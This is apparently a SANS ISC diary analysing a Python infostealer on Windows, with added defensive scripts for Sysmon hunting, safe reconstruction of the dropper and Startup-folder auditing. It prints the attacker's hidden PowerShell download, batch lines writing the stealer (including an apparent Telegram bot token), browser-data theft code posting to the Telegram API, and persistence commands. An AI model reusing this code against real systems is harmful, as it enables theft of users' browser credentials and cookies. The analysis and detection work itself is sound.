Short Summary:
This article discusses the increasing use of Python in malicious activities within the Windows ecosystem. It highlights how attackers exploit Python’s ease of deployment, lack of integration with AMSI, and its ability to interact with various system layers to create and execute malicious scripts. The article provides examples of how Python scripts can be delivered and executed on victim machines, emphasizing the need for vigilance against suspicious Python processes.
Key Points:
- Python is frequently used in malicious scripts within the Windows ecosystem.
- Because Python is not installed by default on Windows, attackers can easily deploy their own copy of it.
- Python's lack of AMSI integration lets attackers execute scripts without the detection coverage that other scripting engines get.
- Malicious Python scripts can be delivered via batch files that reconstruct the script on the victim’s machine.
- Exfiltrated data can be sent to Telegram bots, showcasing a simple load-balancing solution for data theft.
- Persistence mechanisms are often implemented through the Startup menu to ensure continued execution of malicious scripts.
- Monitoring Python processes on Windows hosts is crucial for identifying potential threats.
MITRE ATT&CK TTPs – created by AI
- Command-Line Interface (T1059.003)
  - Attackers use command-line interfaces to execute malicious scripts and commands.
- Exfiltration Over Command and Control Channel (T1041)
  - Data is exfiltrated through established communication channels, such as Telegram bots.
- Persistence (T1547)
  - Malicious scripts are set to run at startup to maintain persistence on the victim's machine.
- Data from Information Repositories (T1213)
  - Attackers gather sensitive information from various data sources, such as browser data.
It has been a while since I started to track how Python is used in the Windows ecosystem[1]. Almost every day I find new pieces of malicious Python scripts. The programming language itself is not malicious; there are plenty of legitimate reasons to use Python on Windows. Think about all of Didier's tools[2]: most of them are written in Python!
Why did Python become so popular with attackers? I think the main reason is that, although the language is not installed by default on Windows, it can be deployed easily by unpacking a few files into any directory, without requiring administrator rights:
```batch
@echo off
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI hxxps://github[.]com/h4x0rpeter/CookieStealer/raw/main/python.zip -OutFile C:\Users\Public\Document.zip;
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden expand-Archive C:\Users\Public\Document.zip -DestinationPath C:\Users\Public\Document;
```
Python can be extended with libraries; if they are added to the ZIP archive, the attacker ships a Python with more than the default capabilities.
Another point: unlike other scripting languages (JS, VBS, PowerShell), Python is not integrated into the AMSI[3] framework. You can easily trace script activity through AMSI:
```powershell
PS1:> logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
```
This command records all activity generated by scripts... except for Python!
Another reason Python is so popular: it can interact with every layer of the operating system (filesystem, registry, processes, network, ...) and it can also call any API from any DLL! I mentioned this in yesterday's diary[4].
Once Python has been deployed on the victim's computer, the malicious script must be delivered. Often the script is downloaded from an online resource, but sometimes it is extracted from another file or... reconstructed! Today, I found a batch file that generates the malicious script by echoing every line into a file on disk:
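Since AMSI gives no visibility into Python, detection has to lean on process-creation and network telemetry instead. The following is an added example written for this page, not code from the diary: a small rule set run over constructed Sysmon-style records (Event ID 1 process creation and Event ID 3 network connection; the field names are Sysmon's, the values are made up). The trusted install directories, the list of user-writable drop zones and the placeholder download host are assumptions to adapt to your own estate. It flags the hidden PowerShell staging step shown above, a python.exe started from a user-writable directory, and a Python process talking to the Telegram API that the stealer further down uses for exfiltration.

```python
"""
Added example (not from the diary): hunting rules for the Python tradecraft
described above, run over constructed Sysmon-style records.
Field names follow Sysmon Event ID 1 (process creation) and Event ID 3
(network connection); all values below are made up for the demo.
"""
import re
from pathlib import PureWindowsPath

# Assumption: where a legitimately installed python.exe lives on your estate.
# Per-user installs (AppData\Local\Programs\Python) would need adding here.
TRUSTED_PYTHON_DIRS = (
    r"c:\program files\python",
    r"c:\program files (x86)\python",
    r"c:\python",
)
# User-writable drop zones of the kind used by the batch file in the diary.
WRITABLE_DROP_DIRS = (r"c:\users\public", r"\appdata\local\temp", r"\downloads")
HIDDEN_WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+hidden")
STAGING_CMDLETS = ("invoke-webrequest", "expand-archive", "start-bitstransfer")


def _norm(path: str) -> str:
    """Normalise a Windows path for case-insensitive prefix/substring checks."""
    return str(PureWindowsPath(path)).lower()


def is_python_image(image: str) -> bool:
    return PureWindowsPath(image).name.lower() in ("python.exe", "pythonw.exe")


def classify_python_path(image: str):
    """Why a python.exe location is suspicious, or None if it is a known install."""
    img = _norm(image)
    if not is_python_image(img):
        return None
    if any(d in img for d in WRITABLE_DROP_DIRS):
        return "user-writable directory"
    if not any(img.startswith(d) for d in TRUSTED_PYTHON_DIRS):
        return "not a known install directory"
    return None


def analyze(events):
    """Return (rule, event_index, detail) tuples for every record that matches a rule."""
    findings = []
    for i, ev in enumerate(events):
        image = ev.get("Image", "")
        if ev["EventID"] == 1:
            cmd = ev.get("CommandLine", "").lower()
            if PureWindowsPath(image).name.lower() == "powershell.exe" \
                    and HIDDEN_WINDOW_RE.search(cmd):
                hit = [c for c in STAGING_CMDLETS if c in cmd]
                if hit:
                    findings.append(("hidden_powershell_staging", i, ", ".join(hit)))
            reason = classify_python_path(image)
            if reason:
                findings.append(("python_from_untrusted_path", i, f"{image} ({reason})"))
        elif ev["EventID"] == 3 and is_python_image(image):
            host = ev.get("DestinationHostname", "").lower()
            if host == "api.telegram.org" or host.endswith(".telegram.org"):
                findings.append(("python_to_telegram_api", i, host))
    return findings


# Constructed sample telemetry: a staging download, the dropped interpreter
# running the stub, its Telegram upload, and two benign events for contrast.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://example.invalid/python.zip -OutFile C:\Users\Public\Document.zip"},
    {"EventID": 1, "Image": r"C:\Users\Public\Document\python.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\Public\Document\python.exe C:\Users\Public\stub.py"},
    {"EventID": 3, "Image": r"C:\Users\Public\Document\python.exe",
     "DestinationHostname": "api.telegram.org", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Program Files\Python312\python.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"python.exe C:\tools\zipdump.py sample.zip"},
    {"EventID": 3, "Image": r"C:\Program Files\Python312\python.exe",
     "DestinationHostname": "pypi.org", "DestinationPort": 443},
]

if __name__ == "__main__":
    for rule, idx, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] event #{idx}: {detail}")
```

Run as a script it prints the three hits; the two records for a Python installed under Program Files produce nothing, which is the point of the allowlist in TRUSTED_PYTHON_DIRS. On a real host the same rules apply to Sysmon or EDR process and network events exported as JSON.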
```batch
echo import os,json,shutil,win32crypt,hmac,platform,sqlite3,base64,random,requests,subprocess>>C:\Users\Public\stub.py
echo from datetime import datetime,timedelta>>C:\Users\Public\stub.py
echo from Crypto.Cipher import DES3>>C:\Users\Public\stub.py
echo from Crypto.Cipher import AES>>C:\Users\Public\stub.py
echo from pyasn1.codec.der import decoder>>C:\Users\Public\stub.py
echo from hashlib import sha1, pbkdf2_hmac>>C:\Users\Public\stub.py
echo from Crypto.Util.Padding import unpad >>C:\Users\Public\stub.py
echo from base64 import b64decode>>C:\Users\Public\stub.py
echo idbot = "backup">>C:\Users\Public\stub.py
echo apibot1='7363228617:AAHqve2-Ypl4SopNb04FOWW2Drm6zQ3v8gg'>>C:\Users\Public\stub.py
echo id1='-4288554353'>>C:\Users\Public\stub.py
echo apibot2='7363228617:AAHqve2-Ypl4SopNb04FOWW2Drm6zQ3v8gg'>>C:\Users\Public\stub.py
echo id2='4288554353'>>C:\Users\Public\stub.py
echo hostname = os.getenv("COMPUTERNAME")>>C:\Users\Public\stub.py
echo usernamex = os.getlogin()>>C:\Users\Public\stub.py
echo windows_version = platform.platform()>>C:\Users\Public\stub.py
echo now = datetime.now()>>C:\Users\Public\stub.py
echo response =requests.get("https://ipinfo.io").text>>C:\Users\Public\stub.py
echo ip_country = json.loads(response)>>C:\Users\Public\stub.py
echo name_country = ip_country['region']>>C:\Users\Public\stub.py
```
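A dropper that echoes its payload line by line can be reconstructed statically, which is safer than running it just to obtain stub.py. The script below is an added example (mine, not the diary's and not the malware's own code): it parses echo lines with > and >> redirection, honours the cmd.exe ^ escape character and the truncating effect of a single >, rebuilds one buffer per target file, and then pulls Telegram bot tokens and URLs out of the result. The sample batch text is constructed in the style of the dropper above; its bot token, chat id and paths are placeholders.

```python
"""
Added example (not from the diary): recover the file(s) that a dropper batch
script builds with 'echo ...>file' / 'echo ...>>file' lines, and pull obvious
indicators out of the result, without ever executing the batch file.
The sample batch text is constructed in the style of the diary's dropper;
the bot token and chat id in it are placeholders.
"""
import re
from collections import OrderedDict

# 'echo' + one separator (a space, or '.'/':' for an empty line), the payload,
# then the LAST unescaped '>' or '>>' and the target path (quoted or bare).
ECHO_RE = re.compile(
    r'^\s*echo(?:[.:]|\s)(?P<payload>.*)(?<![\^>])(?P<redir>>>|>)\s*(?P<target>"[^"]*"|\S+)\s*$',
    re.IGNORECASE,
)
TELEGRAM_TOKEN_RE = re.compile(r"\b\d{8,12}:[A-Za-z0-9_-]{35}\b")
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


def unescape_batch(text: str) -> str:
    """Undo cmd.exe quoting: '^x' -> 'x' (so '^>' survives as '>'), '%%' -> '%'."""
    return re.sub(r"\^(.)", r"\1", text).replace("%%", "%")


def reconstruct(batch_text: str):
    """Map each redirect target to the text the batch file would have written."""
    files = OrderedDict()
    for raw in batch_text.splitlines():
        m = ECHO_RE.match(raw)
        if not m:
            continue  # not an echo-redirect line (e.g. '@echo off', 'for', 'powershell')
        target = m["target"].strip('"')
        if m["redir"] == ">":
            files[target] = []  # a single '>' truncates the file first
        files.setdefault(target, []).append(unescape_batch(m["payload"]))
    return {t: "\n".join(lines) + "\n" for t, lines in files.items()}


def extract_iocs(script_text: str):
    """Telegram bot tokens (<bot id>:<35-char secret>) and URLs found in a recovered file."""
    return {
        "telegram_bot_tokens": sorted(set(TELEGRAM_TOKEN_RE.findall(script_text))),
        "urls": sorted(set(URL_RE.findall(script_text))),
    }


# Constructed sample in the style of the diary's dropper (placeholder token/chat id).
SAMPLE_BATCH = r"""@echo off
echo import os,json,requests>C:\Users\Public\stub.py
echo apibot1='1234567890:AAExampleExampleExampleExampleABCDE'>>C:\Users\Public\stub.py
echo id1='-1001234567890'>>C:\Users\Public\stub.py
echo url = 'https://api.telegram.org/bot' ^+ apibot1 ^+ '/sendDocument'>>C:\Users\Public\stub.py
echo if len(url) ^> 0: print("ready")>>C:\Users\Public\stub.py
echo.>>C:\Users\Public\stub.py
echo cmd /c C:\Users\Public\Document\python.exe C:\Users\Public\stub.py>>C:\Users\Public\Windows.bat
"""

if __name__ == "__main__":
    for path, content in reconstruct(SAMPLE_BATCH).items():
        print(f"=== {path} ===\n{content}")
        print(extract_iocs(content))
```

The parser treats the last unescaped redirection on a line as the real one, which is how cmd.exe resolves it; a `^` before `>` or `+` is stripped so the recovered Python reads as it would on disk. Feed it the original batch file and you get stub.py and Windows.bat without touching the interpreter.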
The purpose of the script is simple: it's another infostealer that exfiltrates the collected information via Telegram:
```python
# Excerpt from the reconstructed stub.py; name_f, timezone, ip and
# get_browser_data() are defined in parts of the script not shown here.
def main():
    numbers=intNumbers()
    number = "Status number send: " + str(numbers)
    u2 = 'hxxps://api[.]telegram[.]org/bot'+apibot2+'/sendDocument'
    u1 = 'hxxps://api[.]telegram[.]org/bot'+apibot1+'/sendDocument'
    browsers = {
        'chrome': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data"),
        'Edge': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Microsoft", "Edge", "User Data"),
        'Opera': os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Opera Software", "Opera Stable"),
        'Brave': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "BraveSoftware", "Brave-Browser", "User Data"),
        'firefox': os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Mozilla", "Firefox", "Profiles"),
        'chromium': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Chromium", "User Data")
    }
    data_path = os.path.join(os.environ["TEMP"], name_f)
    os.mkdir(data_path)
    data_path_ck = os.path.join(os.environ["TEMP"], name_f, "filecookie")
    os.mkdir(data_path_ck)
    for browser_name, browser_path in browsers.items():
        get_browser_data(data_path, browser_path, browser_name)
    zip_file_path = os.path.join(os.environ["TEMP"], name_f + '.zip')
    shutil.make_archive(zip_file_path[:-4], 'zip', data_path)
    if numbers == 1:
        with open(zip_file_path, 'rb') as f:
            requests.post(u1,data={'caption': "\n"+"Country : "+name_country + "-" + timezone + "\n"+ windows_version +"\r\nIPAdress:"+ip + "\r\n"+ number,'chat_id': id1},files={'document': f})
    else :
        with open(zip_file_path, 'rb') as f:
            requests.post(u2,data={'caption': "\n"+"Country : "+ name_country + "-" + timezone +"\n"+ windows_version +"\r\nIPAddress:"+ip + "\r\n"+ number,'chat_id': id2},files={'document': f})
    shutil.rmtree(data_path, ignore_errors=True)
    try:
        os.remove(zip_file_path)
    except Exception as e:
        print("Error")
```
Funny: the exfiltrated data is sent to one of two Telegram bots depending on the value of numbers, a run counter kept on disk. It's a simple load-balancing solution:
```python
def intNumbers():
    path_demso = r"C:\Users\Public\number.txt"
    if os.path.exists(path_demso):
        with open(path_demso, 'r') as file:
            number = file.read()
        number = int(number)+1
        with open(path_demso, 'w') as file:
            abc = str(number)
            file.write(abc)
    else:
        with open(path_demso, 'w') as file:
            file.write("1")
        number = 1
    return number
```
Finally, persistence is added via the Startup menu:
```batch
for /f %%i in ('echo %USERNAME%') do set user=%%i
echo cmd /c C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\Users\Public\Document\python.exe C:\Users\Public\stub.py;>>C:\Users\Public\Windows.bat
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "Get-Content 'C:\Users\Public\Windows.bat' | Set-Content 'C:\Users\!user!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.bat'"
```
Once again, the batch file has a low VT score (4/65)[5].
Conclusion: Keep an eye on Python processes on your Windows hosts! If you don't need Python for your daily tasks, any Python process should be considered suspicious!
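The persistence step copies a .bat into the per-user Startup folder, so that folder is worth auditing on a regular basis. The script below is an added example, not code from the diary: audit_startup_dir() takes any directory, so it can be pointed at %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup on a real host, and build_sample() creates a constructed folder (one Windows.bat in the pattern shown above, plus a benign desktop.ini and a stand-in shortcut) so it can be run offline. The interpreter list, the user-writable directories and the hidden-window regex are assumptions to tune for your environment.

```python
"""
Added example (not from the diary): audit a Startup folder for entries of the
kind described above, i.e. a script that launches python.exe from a
user-writable location with a hidden window.  audit_startup_dir() takes any
directory; build_sample() creates a constructed one for an offline run.
"""
import re
import tempfile
from pathlib import Path

SCRIPT_SUFFIXES = (".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta")
INTERPRETERS = ("python.exe", "pythonw.exe", "powershell.exe",
                "wscript.exe", "cscript.exe", "mshta.exe")
# Assumption: locations a standard user can write to and that no legitimate
# autostart entry on this estate should reference.
WRITABLE_DIRS = (r"c:\users\public", r"\appdata\local\temp", r"c:\programdata")
HIDDEN_WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+hidden")


def audit_startup_entry(path: Path):
    """List the reasons an autostart file looks suspicious (empty list = nothing found)."""
    reasons = []
    if path.suffix.lower() in SCRIPT_SUFFIXES:
        reasons.append(f"script file in Startup folder ({path.suffix.lower()})")
    # .lnk shortcuts are binary; reading them as text is a coarse but usable check
    # for the path strings they embed.
    text = path.read_text(errors="ignore").lower()
    for interp in INTERPRETERS:
        if interp in text:
            reasons.append(f"launches {interp}")
    if any(d in text for d in WRITABLE_DIRS):
        reasons.append("references a user-writable directory")
    if HIDDEN_WINDOW_RE.search(text):
        reasons.append("requests a hidden window")
    return reasons


def audit_startup_dir(startup_dir):
    """Map file name -> reasons, for every file in the folder that triggered a rule."""
    results = {}
    for entry in sorted(Path(startup_dir).iterdir()):
        if entry.is_file():
            reasons = audit_startup_entry(entry)
            if reasons:
                results[entry.name] = reasons
    return results


def build_sample() -> Path:
    """Constructed Startup folder: the diary's Windows.bat pattern plus two benign files."""
    d = Path(tempfile.mkdtemp(prefix="startup_sample_"))
    (d / "Windows.bat").write_text(
        r"cmd /c C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "
        r"C:\Users\Public\Document\python.exe C:\Users\Public\stub.py;" + "\n")
    (d / "desktop.ini").write_text(
        "[.ShellClassInfo]\nLocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21787\n")
    (d / "Notes.lnk").write_bytes(b"L\x00\x00\x00")  # constructed stand-in for a shortcut
    return d


if __name__ == "__main__":
    for name, reasons in audit_startup_dir(build_sample()).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

Only Windows.bat is reported, with all five reasons; the desktop.ini that every Startup folder contains stays silent. The same checks can be applied to the machine-wide Startup folder under ProgramData and to the Run keys, which the diary's sample does not use but which serve the same purpose.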
[1] https://www.sans.org/webcasts/who-said-that-python-was-unix-best-friend-only/
[2] https://blog.didierstevens.com/my-software/
[3] https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
[4] https://isc.sans.edu/diary/From%20Highly%20Obfuscated%20Batch%20File%20to%20XWorm%20and%20Redline/31204
[5] https://www.virustotal.com/gui/file/e721ae2bfd0f3bc4da3b60090aa734cd31878134ed3fdfa49abc4b26b825da47/detection
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
Source: https://isc.sans.edu/diary/rss/31208